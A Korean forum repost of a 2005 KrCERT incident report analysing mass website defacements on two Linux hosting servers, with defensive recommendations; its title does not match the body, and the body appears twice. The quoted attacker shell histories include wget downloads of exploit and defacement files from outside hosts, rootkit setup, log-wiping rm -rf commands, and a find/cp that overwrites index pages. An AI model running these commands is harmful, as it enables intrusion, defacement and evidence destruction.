리눅스 분류
스팸메일 발송으로 이용된 악성 Bot감염 시스템 분석 보고서
작성자 정보
- 웹관리자 작성
- 작성일
컨텐츠 정보
- 4,913 조회
- 0 추천
- 목록
본문
KrCERT-2005-5 http://www.krcert.org
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
대규모 홈페이지
변조사례 및 보안대책
2005. 3. 31
인터넷침해사고대응지원센터 (KISC)
※ 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]룰 명시하여
주시기 바랍니다.
KrCERT-2005-5 http://www.krcert.org
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터 -
1
-
1. 개 요
작년 말부터 올해 1월말까지 많이 발생하였던 홈페이지 변조사고가 2월에 들어
많이 감소하기는 하였으나 아직도 꾸준히 발생하고 있는 것으로 확인되고 있다.
본 문서에서는 2개 업체의 피해 분석사례를 통해 최근 홈페이지 변조사고의
진행과정을 파악해 보도록 한다.
2. 피해시스템 개요
1) A사의 웹호스팅 서버 (190개 도메인 웹 서비스 중)
o 운영체제 : Rehat Linux 7.3 (Kernel:2.4.18-3smp)
Apache
: 1.3.26
PHP
: 4.3.1
FTP
: proftpd-1.2.2rc1-1
SSH
: openssh-3.1p1-3
o 사용중인 웹 게시판
Zeroboard : 4.1.p14
Technote : Top Free
기타 게시판 프로그램들
o 시스템용도 : Web, Mail, DNS, FTP, Telnet, My-SQL
2) B사의 홈페이지 서버 (34개 도메인 웹 서비스 중)
o 운영체제 : Rehat Linux 8.0 (Kernel:2.4.18-14smp)
Apache
: 1.3.29
PHP
: 4.3.4
FTP
: vsftpd-1.1.0-1
SSH
: openssh-3.4p1-2
o 사용중인 웹 게시판
Zeroboard : 4.1.p12
기타 게시판 프로그램들
o 시스템용도 : Web, Mail, DNS, FTP, SSH, My-SQL
3. 피해 현황
A社의 피해 시스템은 서버 호스팅 서비스를 통해 실제 홈페이지는 E社가 운영중인
시스템으로서, 홈페이지 유료가입 고객에게 홈페이지 제작과 함께 서브도메인 형식
KrCERT-2005-5 http://www.krcert.org
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터 -
2
-
으로 도메인을 제공하고 있는 시스템이었다. A社에 확인결과 해당 시스템은 서버
호스팅 서버이므로 시스템의 관리는 E社측에서 담당해야 하나 시스템 관리자가 없어
전혀 관리가 이루어지지 않는 상태로 확인되었다.
A사 홈페이지의 변조화면
A社의 피해 시스템은 190여 개의 도메인이 운영 중인 상태로, 사용자가 웹
게시판 프로그램을 자유롭게 설치할 수 있는 상태로 운영 중이었다. 제로보드
및 테크노트 등 다양한 웹 게시판이 설치된 상태였으며, 3월 8일 이란 해커그룹
에 의해 홈페이지 변조사고가 발생하였다.
B社의 피해 시스템 역시, 다수의 도메인이 운영중인 서버로서 CGI를 이용한 게
시판과 제로보드를 사용중인 도메인이 확인되었으며, 브라질 해커그룹에 의해 3월
30일 홈페이지가 변조되었다.
4. 피해 분석
두 업체의 경우를 비교해 보면, 국적이 서로 다른 두 해커그룹에 의해 피해가
발생하였지만, 피해시스템의 구성과 함께 홈페이지 변조작업 상에 공통점이 많이
발견되고 있다.
KrCERT-2005-5 http://www.krcert.org
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터 -
3
-
□ 로그 삭제
두 사고 모두, 로그 디렉토리(/var/log)가 삭제되어 정확한 변조수법 파악이 어려운
상태였으나 설치된 악성프로그램과 접속기록 둥을 통해 진행된 변조작업이 유사
한 것을 확인할 수 있었다.
□ nobody 권한의 백도어 생성
로그 디렉토리 자체를 삭제하여 공격에 이용된 취약점은 정확히 확인할 수
없었으나, /tmp 또는 /var/tmp 디렉토리에 nobody 소유의 백도어 프로그램이
설치되어 있었고, 외부에서 이 백도어를 이용해 접속 시 별도의 로긴 작업 없이
바로 nobody권한의 쉘을 획득할 수 있다.
백도어 프로그램(cgi)는 백도어 오픈 후 삭제한 것으로 확인되었으며, 분석결과 두 사고
에서 확인된 백도어 프로그램이 같은 프로그램임을 확인할 수 있었다.
[root@www /]# ls -alct /var/tmp
합계 32
drwxrwxrwt 2 root root 4096 3월 30 16:59 .
drwxr-xr-x 19 root root 4096 3월 30 16:52 ..
-rw-r--r-- 1 nobody nobody 17855 3월 30 10:18 cgi
KrCERT-2005-5 http://www.krcert.org
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터 -
4
-
A社시스템의 /tmp 디렉토리에 남아있던 .bash_history 파일의 내용을 보면
국외의 사이트를 통해 악성 프로그램의 압축파일(.xpl.tar)를 다운로드 한 후, 루트
킷과 백도어 프로그램을 설치하는 것을 볼 수 있다. 또한 로그와 관련된 디렉토
리와 히스토리 파일을 지운 것을 알 수 있다.
KrCERT-2005-5 http://www.krcert.org
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터 -
5
-
[root@localhost tmp]# more .bash_history
cd /tmp
wget thg.wonwan.com/xpl/.xpl.tar;tar -xf .xpl.tar;cd .h;ls -al
./p
tar -xf rk.tar;cd midas
./setup thaxorz 19980
ps
cd /tmp
ls -al
rm -rf .xpl.tar .h
cd ~
ls -al
rm -rf /var/log
rm -rf /var/adm
rm -rf /var/apache/log
rm -rf /var/log /var/spool/mail/root
rm -rf .bash_history
□ 취약한 버전의 게시판과 PHP의 설정오류 존재
두 서버 모두 취약한 버전의 제로보드를 사용이었고, PHP의 설정 중
“allow_url_fopen=On“으로 설정되어 있어 취약점의 공격이 가능한 상태로 설정되어
있었다.
특히 B社의 경우, 운영 중인 홈페이지 중 한군데의 홈페이지에서 취약한 버전의
제로보드(4.1 pl2)를 사용하고 있었는데, 그 한 개의 홈페이지로 인해 전체 19개의 홈
페이지가 모두 변조되는 사고가 발생하였다.
□ 루트권한 획득 및 홈페이지 파일 변조
백도어를 통한 시스템 접속만으로는 홈페이지 변조를 할 수 없으며, 홈페이지 변조를
위해서는 시스템 루트 권한이 필요하게 되는데 아래 내용을 통해 루트권한의 획득을
위해 시스템 내부 취약점을 이용한 로컬 익스플로잇(.h)를 실행한 것을 볼 수 있다.
KrCERT-2005-5 http://www.krcert.org
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터 -
6
-
[root@localhost 18655]# ls -alct
total 0
dr-x------ 2 root root 0 Mar 8 11:43 fd
-r-------- 1 root root 0 Mar 8 11:43 environ
-r--r--r-- 1 root root 0 Mar 8 11:43 status
-r--r--r-- 1 root root 0 Mar 8 11:43 cmdline
-r--r--r-- 1 root root 0 Mar 8 11:43 stat
-r--r--r-- 1 root root 0 Mar 8 11:43 statm
-r--r--r-- 1 root root 0 Mar 8 11:43 cpu
-r--r--r-- 1 root root 0 Mar 8 11:43 maps
-rw------- 1 root root 0 Mar 8 11:43 mem
lrwxrwxrwx 1 root root 0 Mar 8 11:43 cwd -> /tmp/.h (deleted)
lrwxrwxrwx 1 root root 0 Mar 8 11:43 root -> /
lrwxrwxrwx 1 root root 0 Mar 8 11:43 exe -> /sbin/syslogd
-r--r--r-- 1 root root 0 Mar 8 11:43 mounts
dr-xr-xr-x 3 root root 0 Mar 8 11:43 .
dr-xr-xr-x 107 root root 0 Nov 20 03:26 ..
root 권한 획득 후, 외부의 사이트에서 변조에 사용할 index 파일을 해외 사이트
에서 다운로드 한 후, 시스템 내 운영되고 있는 도메인 명을 수집하여 index 파일을 변조하였다.
[root@localhost root]# more .bash_history
rm -rf .bash_history
quit
quit
exit
exit
w
uname -a
uptime
cd /tmp
wget www.sharemation.com/0wner/index.html >> 변조 index.html 다운로드
cat index.html
clear
find /home -name "index.*" -exec cp /tmp/index.html {} ; >> index 파일 변조
5. 결론
동일한 취약점을 이용한 홈페이지 변조사고가 지속적으로 발생하고 있음에도
불구하고 분석을 진행한 두 업체의 경우 보안조치가 이루어지지 않았음을 알 수
있다.
본 사고는 시스템 관리자 또는 홈페이지 관리자가 보안에 약간의 관심을 가지고
시스템을 운영했다면 미리 막을 수 있는 사고로서 특히 하나의 시스템에 여러
도메인을 운영하고 있는 경우,
- 홈페이지 변조피해를 막기 위해 필히 현재 설치되어 있는 게시판의 현황을
KrCERT-2005-5 http://www.krcert.org
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터 -
7
-
파악하여야 하고, 해당 게시판에 맞는 보안패치를 적용하거나 PHP의 설정을
변경하는 작업을 해야 한다.
- 또한 시스템 관리자는 최신 보안 이슈에 항상 관심을 가지고, 주요 취약점이
발표되었을 때 신속히 운영 중인 시스템에 적용해야 한다.
6. 참고자료
o KrCERT 홈페이지
- 홈페이지 대량 변조 발생에 따른 대응 조치
(http://www.krcert.or.kr/intro/notice_read.jsp?NUM=64&menu=1)
- PHP 웹 게시판 관련 침해사고 분석 및 보안대책
(http://www.krcert.or.kr/report/download.jsp?no=IN2005001&seq=3)
o 공개용 웹 게시판 홈페이지
- 제로보드 : http://www.nzeo.com/
- 테크노트 : http://www.technote.co.kr
- 그누보드 : http://sir.co.kr/
- KorWeblog : http://kldp.net/
- phpBB : http://www.phpbb.com/
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터
대규모 홈페이지
변조사례 및 보안대책
2005. 3. 31
인터넷침해사고대응지원센터 (KISC)
※ 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]룰 명시하여
주시기 바랍니다.
KrCERT-2005-5 http://www.krcert.org
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터 -
1
-
1. 개 요
작년 말부터 올해 1월말까지 많이 발생하였던 홈페이지 변조사고가 2월에 들어
많이 감소하기는 하였으나 아직도 꾸준히 발생하고 있는 것으로 확인되고 있다.
본 문서에서는 2개 업체의 피해 분석사례를 통해 최근 홈페이지 변조사고의
진행과정을 파악해 보도록 한다.
2. 피해시스템 개요
1) A사의 웹호스팅 서버 (190개 도메인 웹 서비스 중)
o 운영체제 : Rehat Linux 7.3 (Kernel:2.4.18-3smp)
Apache
: 1.3.26
PHP
: 4.3.1
FTP
: proftpd-1.2.2rc1-1
SSH
: openssh-3.1p1-3
o 사용중인 웹 게시판
Zeroboard : 4.1.p14
Technote : Top Free
기타 게시판 프로그램들
o 시스템용도 : Web, Mail, DNS, FTP, Telnet, My-SQL
2) B사의 홈페이지 서버 (34개 도메인 웹 서비스 중)
o 운영체제 : Rehat Linux 8.0 (Kernel:2.4.18-14smp)
Apache
: 1.3.29
PHP
: 4.3.4
FTP
: vsftpd-1.1.0-1
SSH
: openssh-3.4p1-2
o 사용중인 웹 게시판
Zeroboard : 4.1.p12
기타 게시판 프로그램들
o 시스템용도 : Web, Mail, DNS, FTP, SSH, My-SQL
3. 피해 현황
A社의 피해 시스템은 서버 호스팅 서비스를 통해 실제 홈페이지는 E社가 운영중인
시스템으로서, 홈페이지 유료가입 고객에게 홈페이지 제작과 함께 서브도메인 형식
KrCERT-2005-5 http://www.krcert.org
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터 -
2
-
으로 도메인을 제공하고 있는 시스템이었다. A社에 확인결과 해당 시스템은 서버
호스팅 서버이므로 시스템의 관리는 E社측에서 담당해야 하나 시스템 관리자가 없어
전혀 관리가 이루어지지 않는 상태로 확인되었다.
A사 홈페이지의 변조화면
A社의 피해 시스템은 190여 개의 도메인이 운영 중인 상태로, 사용자가 웹
게시판 프로그램을 자유롭게 설치할 수 있는 상태로 운영 중이었다. 제로보드
및 테크노트 등 다양한 웹 게시판이 설치된 상태였으며, 3월 8일 이란 해커그룹
에 의해 홈페이지 변조사고가 발생하였다.
B社의 피해 시스템 역시, 다수의 도메인이 운영중인 서버로서 CGI를 이용한 게
시판과 제로보드를 사용중인 도메인이 확인되었으며, 브라질 해커그룹에 의해 3월
30일 홈페이지가 변조되었다.
4. 피해 분석
두 업체의 경우를 비교해 보면, 국적이 서로 다른 두 해커그룹에 의해 피해가
발생하였지만, 피해시스템의 구성과 함께 홈페이지 변조작업 상에 공통점이 많이
발견되고 있다.
KrCERT-2005-5 http://www.krcert.org
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터 -
3
-
□ 로그 삭제
두 사고 모두, 로그 디렉토리(/var/log)가 삭제되어 정확한 변조수법 파악이 어려운
상태였으나 설치된 악성프로그램과 접속기록 둥을 통해 진행된 변조작업이 유사
한 것을 확인할 수 있었다.
□ nobody 권한의 백도어 생성
로그 디렉토리 자체를 삭제하여 공격에 이용된 취약점은 정확히 확인할 수
없었으나, /tmp 또는 /var/tmp 디렉토리에 nobody 소유의 백도어 프로그램이
설치되어 있었고, 외부에서 이 백도어를 이용해 접속 시 별도의 로긴 작업 없이
바로 nobody권한의 쉘을 획득할 수 있다.
백도어 프로그램(cgi)는 백도어 오픈 후 삭제한 것으로 확인되었으며, 분석결과 두 사고
에서 확인된 백도어 프로그램이 같은 프로그램임을 확인할 수 있었다.
[root@www /]# ls -alct /var/tmp
합계 32
drwxrwxrwt 2 root root 4096 3월 30 16:59 .
drwxr-xr-x 19 root root 4096 3월 30 16:52 ..
-rw-r--r-- 1 nobody nobody 17855 3월 30 10:18 cgi
KrCERT-2005-5 http://www.krcert.org
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터 -
4
-
A社시스템의 /tmp 디렉토리에 남아있던 .bash_history 파일의 내용을 보면
국외의 사이트를 통해 악성 프로그램의 압축파일(.xpl.tar)를 다운로드 한 후, 루트
킷과 백도어 프로그램을 설치하는 것을 볼 수 있다. 또한 로그와 관련된 디렉토
리와 히스토리 파일을 지운 것을 알 수 있다.
KrCERT-2005-5 http://www.krcert.org
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터 -
5
-
[root@localhost tmp]# more .bash_history
cd /tmp
wget thg.wonwan.com/xpl/.xpl.tar;tar -xf .xpl.tar;cd .h;ls -al
./p
tar -xf rk.tar;cd midas
./setup thaxorz 19980
ps
cd /tmp
ls -al
rm -rf .xpl.tar .h
cd ~
ls -al
rm -rf /var/log
rm -rf /var/adm
rm -rf /var/apache/log
rm -rf /var/log /var/spool/mail/root
rm -rf .bash_history
□ 취약한 버전의 게시판과 PHP의 설정오류 존재
두 서버 모두 취약한 버전의 제로보드를 사용이었고, PHP의 설정 중
“allow_url_fopen=On“으로 설정되어 있어 취약점의 공격이 가능한 상태로 설정되어
있었다.
특히 B社의 경우, 운영 중인 홈페이지 중 한군데의 홈페이지에서 취약한 버전의
제로보드(4.1 pl2)를 사용하고 있었는데, 그 한 개의 홈페이지로 인해 전체 19개의 홈
페이지가 모두 변조되는 사고가 발생하였다.
□ 루트권한 획득 및 홈페이지 파일 변조
백도어를 통한 시스템 접속만으로는 홈페이지 변조를 할 수 없으며, 홈페이지 변조를
위해서는 시스템 루트 권한이 필요하게 되는데 아래 내용을 통해 루트권한의 획득을
위해 시스템 내부 취약점을 이용한 로컬 익스플로잇(.h)를 실행한 것을 볼 수 있다.
KrCERT-2005-5 http://www.krcert.org
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터 -
6
-
[root@localhost 18655]# ls -alct
total 0
dr-x------ 2 root root 0 Mar 8 11:43 fd
-r-------- 1 root root 0 Mar 8 11:43 environ
-r--r--r-- 1 root root 0 Mar 8 11:43 status
-r--r--r-- 1 root root 0 Mar 8 11:43 cmdline
-r--r--r-- 1 root root 0 Mar 8 11:43 stat
-r--r--r-- 1 root root 0 Mar 8 11:43 statm
-r--r--r-- 1 root root 0 Mar 8 11:43 cpu
-r--r--r-- 1 root root 0 Mar 8 11:43 maps
-rw------- 1 root root 0 Mar 8 11:43 mem
lrwxrwxrwx 1 root root 0 Mar 8 11:43 cwd -> /tmp/.h (deleted)
lrwxrwxrwx 1 root root 0 Mar 8 11:43 root -> /
lrwxrwxrwx 1 root root 0 Mar 8 11:43 exe -> /sbin/syslogd
-r--r--r-- 1 root root 0 Mar 8 11:43 mounts
dr-xr-xr-x 3 root root 0 Mar 8 11:43 .
dr-xr-xr-x 107 root root 0 Nov 20 03:26 ..
root 권한 획득 후, 외부의 사이트에서 변조에 사용할 index 파일을 해외 사이트
에서 다운로드 한 후, 시스템 내 운영되고 있는 도메인 명을 수집하여 index 파일을 변조하였다.
[root@localhost root]# more .bash_history
rm -rf .bash_history
quit
quit
exit
exit
w
uname -a
uptime
cd /tmp
wget www.sharemation.com/0wner/index.html >> 변조 index.html 다운로드
cat index.html
clear
find /home -name "index.*" -exec cp /tmp/index.html {} ; >> index 파일 변조
5. 결론
동일한 취약점을 이용한 홈페이지 변조사고가 지속적으로 발생하고 있음에도
불구하고 분석을 진행한 두 업체의 경우 보안조치가 이루어지지 않았음을 알 수
있다.
본 사고는 시스템 관리자 또는 홈페이지 관리자가 보안에 약간의 관심을 가지고
시스템을 운영했다면 미리 막을 수 있는 사고로서 특히 하나의 시스템에 여러
도메인을 운영하고 있는 경우,
- 홈페이지 변조피해를 막기 위해 필히 현재 설치되어 있는 게시판의 현황을
KrCERT-2005-5 http://www.krcert.org
대규모 홈페이지 변조사례 및 보안대책 cert@certcc.or.kr
________________________________________________________________________________________
__________________________________________________________________________________________
KISC
인터넷침해사고대응지원센터 -
7
-
파악하여야 하고, 해당 게시판에 맞는 보안패치를 적용하거나 PHP의 설정을
변경하는 작업을 해야 한다.
- 또한 시스템 관리자는 최신 보안 이슈에 항상 관심을 가지고, 주요 취약점이
발표되었을 때 신속히 운영 중인 시스템에 적용해야 한다.
6. 참고자료
o KrCERT 홈페이지
- 홈페이지 대량 변조 발생에 따른 대응 조치
(http://www.krcert.or.kr/intro/notice_read.jsp?NUM=64&menu=1)
- PHP 웹 게시판 관련 침해사고 분석 및 보안대책
(http://www.krcert.or.kr/report/download.jsp?no=IN2005001&seq=3)
o 공개용 웹 게시판 홈페이지
- 제로보드 : http://www.nzeo.com/
- 테크노트 : http://www.technote.co.kr
- 그누보드 : http://sir.co.kr/
- KorWeblog : http://kldp.net/
- phpBB : http://www.phpbb.com/
"무단배포금지: 클라우드포털(www.linux.co.kr)의 모든 강좌는 저작권에 의해 보호되는 콘텐츠입니다. 무단으로 복제하여 배포하는 행위는 금지되어 있습니다."
관련자료
-
이전
-
다음
댓글 0
등록된 댓글이 없습니다.
